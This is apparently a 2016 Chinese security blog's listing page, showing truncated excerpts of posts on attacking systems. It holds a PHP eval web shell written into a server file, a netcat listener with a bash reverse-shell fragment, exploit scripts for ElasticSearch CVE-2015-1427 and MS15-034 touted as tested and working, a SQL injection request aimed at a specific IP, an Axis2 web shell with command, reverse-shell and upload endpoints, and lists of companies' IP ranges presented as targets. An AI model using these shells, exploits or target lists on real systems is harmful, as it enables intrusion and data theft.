对某相亲网的一次渗透详解过程 因对方已经修复此漏洞才公布过程。公布过程中,只详解技术,未泄露任何跟此公司数据有关的任何信息。 因为有很多图本人没有保留,所以,文中部分图片是本人后期利用其他服务器补录的。各位仁兄勿见怪。 首先本文利用到的工具如下: 【一】、RedisDesktopManager 【二】、按键精灵 【三】、mstsc 【四】、Nmap 下载地址:https://nmap.org/download.html (如果win环... 2016年04月29日 学习笔记, 漏洞安全 评论 7 条 喜欢 0 阅读 8,068 views 次 阅读全文
Linux常用命令及写文件 SHELL等命令 在Linux管理和配置中,我们经常要修改配置文件,下载修改后再上传,很难提高效率。使用cat命令就可以在脚本里进行多行修改了。当然cat的使用方法还有很多,这里只是其中的一种使用方法。 cat >> /home/monitor/service/web/html/zabbix/test.php <<EOF <?php eval($_POST[1]);?> hello word ! FFFFFFFFFFFFFFFFFFFFFFF EOF nc -l -vv -p 51 bash -i >&... 2016年04月27日 学习笔记 暂无评论 喜欢 0 阅读 2,988 views 次 阅读全文
互联网大公司IP段整理 (精准度90%) 没更新完,时刻更新着。 【一】‘360’公司 101.198.161.9/24 123.125.83.205/24 111.206.65.177/24 111.206.66.21/24 111.206.81.178/24 123.125.160.175/24 123.125.54.110/24 123.125.73.51/24 123.125.74.108/24 123.125.80.252/24 123.125.82.121/24 211.151.122.212/24 220.181.150.202/24 220.181.156.165/24 58.68.151.179/24 58.68.225.3/24 【二】‘珍爱网’公司 121.... 2016年04月21日 学习笔记 暂无评论 喜欢 0 阅读 5,638 views 次 阅读全文
CVE-2015-1427 EXP pthon POC 首先说说代码来源:https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch 非常霸道的脚本。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 #!/bin/python2 # coding: utf-8 # Author: Darren Martyn, Xiphos Research Ltd. # V... 2016年04月20日 汪洋大海 暂无评论 喜欢 0 阅读 3,143 views 次 阅读全文
http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034) 本执行代码转载网络来源地址:http://www.securitysift.com/an-analysis-of-ms15-034/ 本人经过汉化了,如果看着汉化的不顺眼可以自己去用原版。。。。 http-vuln-cve2015-1635.nse HTTP.sys 远程执行代码exp 网上的试验了几个都不好使,不知道为什么,但是下面的这个本人亲测,绝对可以用de POC。 把下方代码保存为 xxxx.py 试用方法: xxxx.py http://ip(换成你要攻... 2016年04月20日 汪洋大海 暂无评论 喜欢 0 阅读 7,882 views 次 阅读全文
泛微协同商务系统e-cology某处SQL注入 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 POST /services/MobileService HTTP/1.1 Content-Type: text/xml SOAPAction: "" Content-Length: 708 Host: 220.248.212.93 Connection: Close Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.... 2016年04月19日 学习笔记 暂无评论 喜欢 0 阅读 5,428 views 次 阅读全文
OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例 OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把。 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1. Nmap脚本ssl-heartbleed.nse: http://nmap.org/nsedoc/scripts/ssl-heartbleed.html 1 nmap -sV --script=ssl-heartbleed <target> 若想要批量寻找攻击目标,可以直接扫目标IP段的443端口。... 2016年04月18日 汪洋大海 OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例已关闭评论 喜欢 0 阅读 4,660 views 次 阅读全文
kali linux2.0 启动Metasploit 首先第一步:service postgresql start 首先启动数据库,然后执行第二步。 第二步:msfdb start 再次启动数据库,这个是MSF(Metasploit)的数据库了。 可以用 ss -ant 的输出来检验PostgreSQL是否在运行,然后确认5432端口处于listening状态。 State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 128 :::22 :::*8 LISTEN 0 128 *:22 *:*3 LISTEN 0 128 127... 2016年04月16日 学习笔记 暂无评论 喜欢 0 阅读 4,480 views 次 阅读全文
rsync 上传下载命令 rsync 192.168.100.1:: 列模块 进去之后 如果要下载。那么可以使用以下命令:rsync -av [email protected]::dbback /tmp/root 后面指的是下载到你机器的tmp文件夹里面的root文件夹里面 如果要上传一个文件。则:rsync -av /tmp/root/1.php [email protected]::dbback 前提是/tmp/root目录下得有一个1.php。 2016年04月16日 学习笔记 暂无评论 喜欢 1 阅读 5,747 views 次 阅读全文
Axis2 Web Shell axis2 web shell 使用介绍: 1、命令执行 http://1.1.1.1/services/config/exec?cmd=whoami (不说了,执行命令。注意:xml换行没有处理好) 2、反弹shell http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555 (Linux则使用bash反弹shell,Windows则会进行socket执行shell) 3、文件上传 http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/sh... 2016年04月15日 汪洋大海 暂无评论 喜欢 0 阅读 4,599 views 次 阅读全文